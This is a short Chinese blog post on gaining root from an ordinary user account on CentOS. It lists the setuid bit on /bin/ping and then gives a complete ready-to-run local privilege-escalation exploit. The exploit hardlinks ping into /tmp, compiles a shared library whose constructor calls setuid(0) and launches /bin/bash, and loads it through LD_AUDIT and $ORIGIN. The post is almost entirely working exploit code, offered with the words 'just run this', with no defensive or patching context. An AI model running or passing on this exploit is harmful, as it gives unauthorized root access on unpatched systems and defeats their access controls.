返回顶部

pzzning

导航

Centos普通用户提权至ROOT

1、利用/bin/ping的漏洞普通用户提权。(rws中的s)

[root@localhost ~]# ls -l /bin/ping
-rwsr-xr-x. 1 root root 40760 9月  26 2013 /bin/ping

2、执行以下代码即可:

#!/bin/sh
unset LD_AUDIT
rm -r -f /tmp/exploit
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
ls -l /proc/$$/fd/3
rm -rf /tmp/exploit
ls -l /proc/$$/fd/3

cat > program.c << _EOF
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
_EOF

gcc -w -fPIC -shared -o /tmp/exploit program.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
unset LD_AUDIT

 

posted on 2016-12-25 23:41  pzzning  阅读(2167)  评论(0编辑  收藏  举报